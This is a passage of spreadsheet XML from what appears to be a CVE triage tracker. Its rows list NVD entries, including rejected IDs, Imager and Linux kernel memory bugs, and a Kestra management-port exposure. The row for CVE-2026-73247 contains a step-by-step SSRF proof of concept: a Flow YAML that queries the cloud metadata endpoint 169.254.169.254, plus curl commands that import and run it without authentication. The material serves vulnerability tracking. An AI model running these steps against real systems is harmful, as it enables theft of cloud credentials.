      <c r="D404" s="5" t="inlineStr"/>
      <c r="E404" s="5" t="inlineStr"/>
      <c r="F404" s="5" t="inlineStr"/>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr"/>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: Red Hat Product Security has come to the conclusion that this CVE is not needed.</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11874</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49137</t>
        </is>
      </c>
      <c r="D405" s="5" t="inlineStr"/>
      <c r="E405" s="5" t="inlineStr"/>
      <c r="F405" s="5" t="inlineStr"/>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr"/>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49137</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49292</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>0</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t>Kiwi TCMS is an open source test management system. Prior to 16.0, the unauthenticated /init-db/ page handled by InitDBView in tcms/core/views.py remains reachable after initial setup and proxies repeated requests to Kiwi/manage.py migrate. The migration command is reentrant, so repeated access reports that no migrations are available and does not cause data loss, alter application state, reveal confidential information, or produce a documented availability impact. This issue is fixed in version 16.0.</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49292</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52483</t>
        </is>
      </c>
      <c r="D407" s="5" t="inlineStr"/>
      <c r="E407" s="5" t="inlineStr"/>
      <c r="F407" s="5" t="inlineStr"/>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr"/>
      <c r="S407" s="5" t="inlineStr">
        <is>
          <t>The ping diagnostics and other similar functions of the MitraStar GPT-2741GNAC-N2-SV router with firmware BR_g8.10_1.11(WVK.0)b46 allow authenticated users execute arbitrary OS command via concatenated params on a crafted POST request for the endpoint /cgi-bin/device-management-utilities-internet.cgi.</t>
        </is>
      </c>
      <c r="T407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52483</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53679</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2026-09-17</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr"/>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: Red Hat Product Security has come to the conclusion that this CVE is not needed.</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53679</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53681</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2026-09-17</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr"/>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: Red Hat Product Security has come to the conclusion that this CVE is not needed.</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53681</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57846</t>
        </is>
      </c>
      <c r="D410" s="5" t="inlineStr"/>
      <c r="E410" s="5" t="inlineStr"/>
      <c r="F410" s="5" t="inlineStr"/>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr"/>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57846</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57847</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2026-09-17</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr"/>
      <c r="S411" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57847</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65323</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2026-09-17</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr"/>
      <c r="S412" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65323</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73245</t>
        </is>
      </c>
      <c r="D413" s="5" t="inlineStr"/>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr">
        <is>
          <t>Maven:io.kestra:kestra</t>
        </is>
      </c>
      <c r="M413" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr"/>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>## Summary
Kestra's Micronaut **management endpoints are served on port 8081 with no authentication**, even when the main API (port 8080) has basic-auth enabled. Anyone who can reach `:8081` can read `GET /env` (full resolved environment/configuration) and mutate runtime state via `POST /loggers/{name}` (change log levels), among the other management endpoints. Enabling basic-auth creates a false sense of protection because the auth filter only covers `/api/v1/**` on 8080 and never applies to the 8081 management port. The shipped repository contains no statement that 8081 is management-only / must-not-be-exposed, and the vendor's reference `docker-compose.yml` publishes it with no warning.
## Affected
- Product: Kestra (`kestra-io/kestra`), an open-source orchestration/data-pipeline platform (Java / Micronaut).
- Version: **v1.3.29** (confirmed); the management-port exposure is an insecure default of the shipped configuration.
- No fix at time of report.
## Technical detail
Kestra runs the Micronaut management/actuator endpoints on a separate HTTP port **8081**. The authentication filter (basic-auth, when configured) is scoped to the main API on port 8080 (`/api/v1/**`) and does not apply to 8081. As a result:
- `GET http://&lt;host&gt;:8081/env` returns the full resolved environment/configuration (property sources), unauthenticated.
- `POST http://&lt;host&gt;:8081/loggers/{name}` changes a logger's level at runtime, unauthenticated (a state-changing operation).
- The other Micronaut management endpoints on 8081 are similarly reachable.
The shipped `application.yml` comments, `SECURITY.md`, and the vendor's reference `docker-compose.yml` do not warn that 8081 must be kept internal, and the reference compose publishes 8081, so a deployment that enables basic-auth on the API still exposes the management port with no auth.
## Impact
An unauthenticated network client that can reach port 8081 can read the full application configuration/environment (`/env`) and change runtime logging (`/loggers`), and reach the other management endpoints — an authentication-bypass on the management surface. (Sensitive credential values in `/env` are masked, so this is scored without a full-secret-read confidentiality impact.)
## Proof of concept
Reproduced live on Kestra v1.3.29 with basic-auth enabled on the main API. Unauthenticated `GET http://&lt;host&gt;:8081/env` returned `200` with the resolved configuration/property sources, and `POST http://&lt;host&gt;:8081/loggers/{name}` returned `200` and changed the logger level — both with no credentials. The equivalent main-API request on 8080 returned `401` (control), confirming the auth filter covers only the API port and not the 8081 management port. (Credential values in `/env` were masked.)
Full request/response captures available on request.
## Remediation
Apply authentication to the management port (bind the Micronaut management endpoints behind the same auth as the API, or require a separate management credential), and by default bind port 8081 to loopback only. At minimum, document prominently (SECURITY.md, application.yml, the reference docker-compose) that port 8081 must never be exposed to untrusted networks, and do not publish 8081 in the reference compose.
## Credit
Reported by **Santosh Kumar Puppala** (GitHub: https://github.com/Santoshkumarpuppala).</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73245</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73247</t>
        </is>
      </c>
      <c r="D414" s="5" t="inlineStr"/>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr">
        <is>
          <t>Maven:io.kestra:core, Maven:io.kestra:kestra-core</t>
        </is>
      </c>
      <c r="M414" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr"/>
      <c r="S414" s="5" t="inlineStr">
        <is>
          <t>### Summary
The Pebble template engine's `http()` function in Kestra OSS accepts user-controlled URLs without any validation, allowing Server-Side Request Forgery (SSRF) attacks. An unauthenticated attacker can import a malicious Flow YAML and execute it to access internal services, cloud metadata endpoints (AWS 169.254.169.254), or localhost services. The vulnerability affects all Kestra OSS deployments with default configuration.
### Details
The root cause is in `core/src/main/java/io/kestra/core/runners/pebble/functions/HttpFunction.java` (lines 77-106):
1. **No URL validation**: User input is passed directly to `URI.create()` with no checks for private IPs, internal hosts, or restricted schemes
2. **No IP filtering**: Missing checks for 10.0.0.0/8, 192.168.0.0/16, 169.254.169.254, 127.0.0.1
3. **No scheme restriction**: `file://`, `gopher://` schemes are not blocked
4. **No authentication required**: `TenantValidationFilter.java` only checks tenant == "main" — no authentication
5. **Unconditional registration**: `HttpFunction` is registered without any feature flags in `Extension.java:180`
### PoC
**Prerequisites:**
```bash
docker run -d --name kestra-ssrf -p 8080:8080 kestra/kestra:latest server local
sleep 30
```
**Step 1: Create malicious Flow YAML**
```yaml
cat &gt; /tmp/ssrf_poc.yaml &lt;&lt; 'YAML'
id: ssrf_metadata
namespace: company.team
tasks:
  - id: exfiltrate
    type: io.kestra.plugin.core.log.Log
    message: |
      {{ http(uri='http://169.254.169.254/latest/meta-data/', method='GET') }}
YAML
```
**Step 2: Import without authentication**
```bash
curl -X POST http://localhost:8080/api/v1/main/flows/import \
  -F "fileUpload=@/tmp/ssrf_poc.yaml"
```
**Step 3: Execute the flow**
```bash
curl -X POST http://localhost:8080/api/v1/main/executions/company.team/ssrf_metadata
```
**Step 4: Verify** — the flow execution output contains AWS EC2 metadata (ami-id, instance-type, IAM credentials if available)
### Impact
- **CVSS 3.1**: 8.6 (HIGH) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- **CWE**: CWE-918 (Server-Side Request Forgery)
- **Affected**: All Kestra OSS versions (default deployment)
- **Impact**: Attackers can access internal services, cloud metadata (AWS/GCP/Azure), localhost endpoints, and potentially escalate to cloud credential theft</t>
        </is>
      </c>
      <c r="T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73247</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73638</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2026-09-17</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S415" s="5" t="inlineStr">
        <is>
          <t>Imager versions from 0.45_02 before 1.035 for Perl read outside the EXIF block via unchecked start offsets in tiff_load_ifd.
tiff_load_ifd() validates an IFD entry's data by checking that `entry-&gt;offset + entry-&gt;size` stays within the EXIF block, and never checks the start offset itself. Where that sum is not the real end of the data, the check passes with the entry starting outside the block.
Through 1.032 `entry-&gt;offset` is a plain int, so on the usual two's-complement implementations an offset with the high bit set converts to negative and the sum can land back inside the block. From 1.033 the field is a size_t and the addition wraps only where size_t is 32 bits. The IFD's own start offset is checked the same way and wraps where unsigned long is 32 bits, which includes 64-bit Windows.
Any caller of Imager-&gt;read() on an attacker-supplied image may receive EXIF tags holding bytes from outside the block, or crash the process.</t>
        </is>
      </c>
      <c r="T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73638</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73639</t>
        </is>
      </c>
      <c r="D416" s="5" t="inlineStr"/>
      <c r="E416" s="5" t="inlineStr"/>
      <c r="F416" s="5" t="inlineStr"/>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>Imager::File::PNG versions from 1.003 before 1.004 for Perl write past the end of the row buffer reading a PNG with a tRNS transparency chunk in read_direct8.
With a tRNS chunk, read_direct8() adds an alpha channel to the image it creates but still sizes the row buffer from the original channel count. libpng expands the transparency into that extra channel, so png_read_row() fills one channel more than the buffer holds, at one byte per sample, and writes width bytes past the end of the allocation. Palette images go to read_paletted() and 16-bit images to read_direct16(), which sizes its buffer from png_get_rowbytes() and allocates enough for the expanded row.
The same reader ships bundled in the Imager distribution.
Reading an attacker-supplied PNG through Imager-&gt;read() corrupts the heap, which can crash the process.</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73639</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78668</t>
        </is>
      </c>
      <c r="D417" s="5" t="inlineStr"/>
      <c r="E417" s="5" t="inlineStr"/>
      <c r="F417" s="5" t="inlineStr"/>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr"/>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: reserved but not needed</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78668</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90050</t>
        </is>
      </c>
      <c r="D418" s="5" t="inlineStr"/>
      <c r="E418" s="5" t="inlineStr"/>
      <c r="F418" s="5" t="inlineStr"/>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr"/>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: fq: clamp quantum and initial_quantum in change path
The fq change path accepts TCA_FQ_QUANTUM in [1, INT_MAX] and
TCA_FQ_INITIAL_QUANTUM up to INT_MAX, while fq_init() already clamps to
[1, 1&lt;&lt;20]. A user can override the init clamp via tc qdisc change,
restoring the small-quantum deficit spin that the init clamp prevents.
Narrow iq_range.max to 1&lt;&lt;20 so TCA_FQ_INITIAL_QUANTUM is rejected at
parse time. Clamp TCA_FQ_QUANTUM to [256, 1&lt;&lt;20] in fq_change() and
fq_init() quantum to [256, 1&lt;&lt;20] for tiny-MTU devices.
Conditions to recreate the bug:
  CONFIG_NET_SCH_FQ=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root fq
  tc qdisc change dev dummy0 root fq quantum 1 stab data 32768 size_log 15 cell_log 0</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90050</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90051</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2026-09-17</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr"/>
      <c r="S419" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tcp: reject non zerocopy devmem tx
Devmem tcp tx doesn't work without zero-copy, however it's not currently
enforced if NETIF_F_SG isn't present. In this case, tcp_sendmsg_locked()
will try the copy path and try to copy data from an iovec which consists
of offsets into the dma-buf and would normally fail. Moreover,
d9c56501c72fd ("net: tcp: block mixing readable and unreadable frags")
relies on that and assumes that the devmem binding is present IFF we're
using the zero-copy path, which can be used to mix net-iov and pages in
a single skb, and break invariants. Let's reject devmem tx without
zero-copy.
Note, the parameter check the patch is modifying is too loose, we can
create an io_uring request with dmabuf_id and all ZC flags, but which
won't have the binding. We replace it with stricter validation.</t>
        </is>
      </c>
      <c r="T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90051</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90052</t>
        </is>
      </c>
      <c r="D420" s="5" t="inlineStr"/>
      <c r="E420" s="5" t="inlineStr"/>
      <c r="F420" s="5" t="inlineStr"/>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="inlineStr"/>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr"/>
      <c r="S420" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-integrity: fix buffer overflow with keyed discard
Since commit 68c5c42567bc ("dm-integrity: replace forgeable discard
filler with a keyed sector marker"), integrity_metadata computes a
checksum for every discarded block into the "checksums" buffer.
integrity_sector_checksum always writes the whole digest. So if the tag
size is smaller than the digest size, the checksum of the last block
that fits into the buffer is written past the end of it. For example,
with hmac(sha256) and tag size 16, a 4MiB discard writes 16 bytes past
the kmalloc'ed page.
Fix this by subtracting extra_space from the buffer size when computing
max_blocks, like we do for writes.</t>
        </is>
      </c>
      <c r="T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90052</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90053</t>
        </is>
      </c>
      <c r="D421" s="5" t="inlineStr"/>
      <c r="E421" s="5" t="inlineStr"/>
      <c r="F421" s="5" t="inlineStr"/>
      <c r="G421" s="5" t="inlineStr"/>
